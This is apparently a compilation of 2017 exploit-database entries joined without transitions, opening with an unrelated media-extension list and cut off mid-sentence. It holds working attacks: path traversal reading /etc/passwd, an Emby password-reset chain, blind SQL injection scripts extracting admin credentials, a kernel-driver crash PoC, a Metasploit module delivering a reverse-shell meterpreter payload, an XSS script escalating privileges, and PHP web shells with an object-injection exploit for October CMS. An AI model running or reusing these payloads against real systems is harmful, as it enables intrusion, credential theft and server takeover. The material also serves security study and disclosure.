3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
==========================
On Linux:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
Emby MediaServer 3.2.5 Password Reset Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------
http://10.211.55.3:8096/web/forgotpassword.html
2. Then, we type any random username and hit submit:
----------------------------------------------------
POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
EnteredUsername=RandomusUsuarius
3. You will get an alert message (Windows/Linux):
-------------------------------------------------
The following file has been created on your server and contains instructions on how to proceed:
C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
-- OR --
/var/lib/emby-server/passwordreset.txt
4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close
Use your web browser to visit:
http://10.211.55.3:8096/web/forgotpasswordpin.html
Enter the following pin code:
6727
The pin code will expire at 91
5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------
POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
Pin=6272
---
We get the message:
Passwords have been removed for the following users. To login, sign in with a blank password.
testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
parameter 'MediaTypes' is not properly sanitised before being returned to the user
or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5400
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
PoC:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close
Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
int main()
{
HANDLE hFile = NULL;
PVOID64 lpInBuffer = NULL;
ULONG64 lpBytesReturned;
PVOID64 BuffAddress = NULL;
SIZE_T BufferSize = 0x800;
printf("Trying the get the handle for the PSMEMDriver device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
return 1;
}
// Allocate memory for our buffer
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpInBuffer == NULL) {
printf("VirtualAlloc() failed. \r\n");
return 1;
}
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
*(PULONG64)BuffAddress = (ULONG64)0x42424242;
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
DeviceIoControl(hFile,
0xb3702c38,
lpInBuffer,
NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
NULL,
NULL,
&lpBytesReturned,
NULL);
/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
printf("Cleaning up.\r\n");
VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
CloseHandle(hFile);
printf("Resources freed up.\r\n");
return 0;
}
# Exploit Title: Easy File Uploader - Arbitrary File Upload
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
Drop file php (shell.php) to upload.
access to http://poc_site/fileFolder/shell.php and enjoy!
# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"
def banner():
print WHITE+""
print " ## ## "
print " ## ## "
print " ############## "
print " #### ###### #### "
print " ###################### "
print " ## ############## ## "
print " ## ## ## ## "
print " #### ####"
print ""
def details():
print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
print ""
def core_commands():
os.system('clear')
print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability
'''
def about():
os.system('clear')
print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
'''
def download():
other = 'a'
while other != 'n':
urltarget = str(raw_input(WHITE+'Target: '))
filename = str(raw_input(WHITE+'FileName: '))
filename = base64.b64encode(filename)
print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
final = urltarget+'download.php?id='+filename
r = requests.get(final)
print r.text
other = str(raw_input(WHITE+'Test other file? y/n: '))
if other == "n":
print "Type quit to exit. Bye!"
banner()
details()
option='0'
while option != 0:
option = (raw_input(RED+"pwn" + WHITE +" > "))
if option == "quit":
os.system('clear')
option = 0
elif option == "?":
core_commands()
elif option == "help":
core_commands()
elif option == "about":
about()
elif option == "download":
download()
elif option == "info":
about()
else:
print "Not a valid option! Need help? Press ? to display core commands " +GREEN
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
'Description' => %q{
This module takes advantage of custom hg-ssh wrapper implementations that don't
adequately validate parameters passed to the hg binary, allowing users to trigger a
Python Debugger session, which allows arbitrary Python code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'claudijd',
],
'References' =>
[
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "Apr 18 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def ssh_priv_key
File.read(datastore['SSH_PRIV_KEY_FILE'])
end
def exploit
factory = ssh_socket_factory
ssh_options = {
auth_methods: ['publickey'],
config: false,
use_agent: false,
key_data: [ ssh_priv_key ],
port: rport,
proxy: factory,
non_interactive: true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection is established.")
ssh.open_channel do |ch|
ch.exec "hg -R --debugger serve --stdio" do |ch, success|
ch.on_extended_data do |ch, type, data|
if data.match(/entering debugger/)
print_good("Triggered Debugger (#{data})")
ch.send_data "#{payload.encoded}\n"
else
print_bad("Unable to trigger debugger (#{data})")
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1118
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.
PoC:
===========================================================
-->
<!-- saved from url=(0014)about:internet -->
<style>
#details { transition-duration: 61s; }
</style>
<script>
function go() {
document.fgColor = "foo";
m.setAttribute("foo", "bar");
document.head.innerHTML = "a";
}
</script>
<body onload=go()>
<details id="details">
<summary style="transform: scaleY(4)">
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
<style></style>
<!--
===========================================================
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.
Debug info:
(d10.1504): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> r
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> k
# ChildEBP RetAddr
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b
-->
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli
#!/usr/bin/python3
# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#
import requests
import string
session = requests.Session()
session.proxies = {'http': 'localhost:8080'}
# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'
FULL_CHARSET = string.ascii_letters + string.digits + '$./'
def blind(field, table, condition, charset):
# We add 9 so that the result has two digits
# If the length is superior to 100-9 it won't work
size = blind_size(
'length(%s)+9' % field, table, condition,
2, string.digits
)
size = int(size) - 9
data = blind_size(
field, table, condition,
size, charset
)
return data
def select_position(field, table, condition, position, char):
payload = 'select(%s)from(%s)where(%s)' % (
field, table, condition
)
payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
payload, ord(char)
)
return payload
def blind_size(field, table, condition, size, charset):
string = ''
for position in range(size):
for char in charset:
payload = select_position(field, table, condition, position+1, char)
if test(payload):
string += char
print(string)
break
else:
raise ValueError('Char was not found')
return string
def test(payload):
response = session.post(
URL,
data=data(payload)
)
response = response.text
return response.index(PATTERN0) < response.index(PATTERN1)
def data(payload):
return {
'tx_news_pi1[overwriteDemand][order]': payload,
'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
'tx_news_pi1[search][subject]': '',
'tx_news_pi1[search][minimumDate]': '2016-01-01',
'tx_news_pi1[search][maximumDate]': '2016-12-31',
}
# Exploit
print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))
---------------------------------------------------------------
# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
# Date: 24/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
# Vendor Website : https://www.revive-adserver.com/
# Software download : https://www.revive-adserver.com/download/
# Version: 4.0.1
# Tested on: Windows 7 x64 SP1 / Kali Linux
Description :
A vulnerability has been discovered in Revive Ad Server, which can be
exploited by malicious people to conduct cross-site scripting attacks.
When you create a banner using Generic HTML Banner, input
passed via the 'htmltemplate' parameter to '/banner-edit.php' is not
properly sanitised before being returned to the user (This is probably
expected as it's an html banner). But, this can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
This XSS vector allow to execute scripts to gather the CSRF token
and submit a form to update user rights
Here's the script :
---------------------- Javascript-------------------------------
var tok = document.getElementsByName('token')[0].value;
var txt = '<form method="POST" id="hacked" action="agency-user.php">'
txt += '<input type="hidden" name="submit[]" value="1"/>'
txt += '<input type="hidden" name="token" value="' + tok + '"/>'
txt += '<input type="hidden" name="userid" value="2"/>'
txt += '<input type="hidden" name="email_address" value="test2@test.com"/>'
txt += '<input type="hidden" name="agencyid" value="1"/>'
txt += '<input type="hidden" name="permissions[]" value="10"/>'
txt += '</form>'
var d1 = document.getElementById('firstLevelContent');
d1.insertAdjacentHTML('afterend', txt);
document.getElementById("hacked").submit();
---------------------- Javascript End-------------------------------
(little trick to submit a form that has a "submit" parameter, just use a
list "submit[]")
This will update user rights and allow to manage accounts
POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM
Patch : No patch yet
---------------------------------------------------------------
October CMS v1.0.412 several vulnerabilities
############################################
Information
===========
Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
management permission
CVE: pending
Credit: Anti Räis
HTML version: https://bitflipper.eu
Product
=======
October is a free, open-source, self-hosted CMS platform based on the
Laravel
PHP Framework.
Description
===========
October CMS build 412 contains several vulnerabilities. Some of them
allow an
attacker to execute PHP code on the server. Following issues have been
identified:
1. PHP upload protection bypass
2. Apache .htaccess upload
3. stored WCI in image name
4. reflected WCI while displaying project ID
5. PHP code execution via asset management
6. delete file via PHP object injection
7. asset save path modification
Proof of Concepts
=================
1. PHP upload protection bypass
-------------------------------
Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().
==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109 return [
110 // redacted
111 'php',
112 'php3',
113 'php4',
114 'phtml',
115 // redacted
116 ];
117 }
==================== source end ========================
We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g if we upload sh.php5 on the server:
==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
==================== source end ========================
Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd
2. Apache .htaccess upload
--------------------------
As described in the PHP upload protection bypass section, the
application uses
black-list based defense. It does not prevent the attacker from uploading a
.htaccess files which makes it exploitable on Apache servers. Attacker
can use
it to add another handler for PHP files and upload code under an alternative
name. Attacker has to first upload the .htaccess configuration file with
following settings:
==================== source start ========================
AddHandler application/x-httpd-php .z
==================== source end ========================
This will execute all .z files as PHP and after uploading a code named
sh.z to
the server. It can be used to execute code as described previously.
3. stored WCI in image name
---------------------------
Authenticated user, with permission to customize back-end settings, can
store
WCI payload in the image name. The functionality is located at:
Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
(edit name) -> (add title)
Set the name to following value:
==================== source start ========================
"><script>alert("stored WCI")</script x="
==================== source end ========================
Payload is executed when the victim clicks on the image name to edit it.
When the administrator edits user's profile image, attacker's payload is
executed, allowing him to execute JavaScript during administrator's active
session. This can be used, for example, to give another user a "super-user"
permission.
4. reflected WCI while displaying project ID
--------------------------------------------
Authenticated user with permission to manage software updates can "Attach
Project". When invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or write the payload in the input field,
then it
isn't easily exploitable.
==================== source start ========================
"><script>alert(1)</script x="
==================== source end ========================
5. PHP code execution via asset management
------------------------------------------
Authenticated user with permission to manage website assets, can use this
functionality to upload PHP code and execute it on the server.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
First, attacker creates a new asset test.js with the following content:
==================== source start ========================
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
==================== source end ========================
After saving the file, attacker renames it to test.php5 by clicking on ">_"
icon on the newly created file. Modal window opens which allows to specify a
new filename.
URL to execute PHP code:
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah
6. delete file via PHP object injection
---------------------------------------
Authenticated user with "Create, modify and delete CMS partials" or "Create,
modify and delete CMS layouts" can move assets to different folders. This
functionality is vulnerable to PHP object injection. User input is read from
selectedList parameter on line 11 and passed as argument to unserialize().
Unserialized array object is passed to validatePath() on line 32.
==================== source start ========================
1 <?php namespace Cms\Widgets;
2
3 class AssetList extends WidgetBase
4 {
5 // redacted
6
7 public function onMove()
8 {
9 $this->validateRequestTheme();
10
11 $selectedList = Input::get('selectedList');
12 if (!strlen($selectedList)) {
13 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
14 }
15
16 $destinationDir = Input::get('dest');
17 if (!strlen($destinationDir)) {
18 throw new ApplicationException(
Lang::get('cms::lang.asset.select_destination_dir'));
19 }
20
21 $destinationFullPath = $this->getFullPath($destinationDir);
22 if (!file_exists($destinationFullPath) ||
!is_dir($destinationFullPath)) {
23 throw new ApplicationException(
Lang::get('cms::lang.asset.destination_not_found'));
24 }
25
26 $list = @unserialize(@base64_decode($selectedList));
27 if ($list === false) {
28 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
29 }
30
31 foreach ($list as $path) {
32 if (!$this->validatePath($path)) {
33 throw new ApplicationException(
Lang::get('cms::lang.asset.invalid_path'));
34 }
35
36 // ...
==================== source end ========================
Following PHP exploit uses the vulnerability. It requires an authenticated
user's session to execute as described previously.
==================== source start ========================
<?php
class Swift_Mime_SimpleHeaderSet {}
class Swift_KeyCache_DiskKeyCache
{
private $_keys;
public function __construct($path, $filename) {
$this->_keys = [$path => [ $filename => null]];
}
}
class Swift_Mime_SimpleMimeEntity {
private $_headers;
private $_cache;
private $_cacheKey;
public function __construct($filename, $path = '') {
$this->_headers = new Swift_Mime_SimpleHeaderSet();
$this->_cache = new Swift_KeyCache_DiskKeyCache($path,
$filename);
$this->_cacheKey = $path;
}
}
function payload($filename) {
$builder = new Swift_Mime_SimpleMimeEntity($filename);
return base64_encode(serialize([$builder]));
}
function http($config) {
$ch = curl_init($config['url']);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
http_build_query($config['data']));
curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
return curl_exec($ch);
}
function get_config($url, $filename, $session) {
return [
'url' => $url.'/backend/cms',
'data' => [
'dest' => '/',
'theme' => 'demo',
'selectedList' => payload($filename),
],
'headers' => [
'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
'X-Requested-With: XMLHttpRequest',
],
'cookies' => 'admin_auth='.$session,
'proxy' => 'localhost:8080',
];
}
$url = 'http://victim.site';
$session = '<specify admin_auth cookie value here>';
$filename = '/tmp/target.txt';
echo http(get_config($url, $filename, $session));
==================== source end ========================
7. asset save path modification
-------------------------------
Authenticated user, with permission to manage website assets, can modify the
path the file is saved to. This allows an attacker to save css, js, less,
sass, scss files at different locations. Attacker can possibly use it to
execute JavaScript on the site, if the application tries to require an
file on
